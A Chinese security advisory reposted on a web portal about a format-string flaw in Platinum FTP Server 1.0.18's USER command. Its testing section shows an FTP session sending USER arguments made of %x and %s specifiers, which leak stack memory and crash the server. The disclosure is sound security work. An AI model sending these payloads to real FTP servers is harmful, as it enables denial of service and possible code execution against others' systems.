Platinum FTP Server USER命令格式串处理漏洞
2008-04-09 04:25:01来源:互联网 阅读 ()
发布日期:2005-03-17
更新日期:2005-03-17
受影响系统:
PlatinumFTP PlatinumFTP Server 1.0.18描述:
Platinum FTP Server是Windows平台下的一款强大的FTP服务器。
Platinum FTP Server对USER命令的参数的处理存在格式串溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。
<*来源:Kaveh Razavi (c0d3r@ihsteam.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111100269512216&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x
331 Password required for AAAA026d00480203133337373615064726f7771657220657269756
f6620644141207278254141782578257825782578257825782578257825782578257825782578257
82578257825782578257825782578257825782578257825782578257825782578257825782578257
825782578257825d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAA¼²ßP¦ .
Password:
---------------------------------------
ftp> user AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe szAppVer : 1.0.0.18
szModName : user32.dll szModVer : 5.1.2600.1106 offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the memory could not be "written".
---------------------------------------
建议:
厂商补丁:
PlatinumFTP
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.platinumftp.com/platinumftpserver.php
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
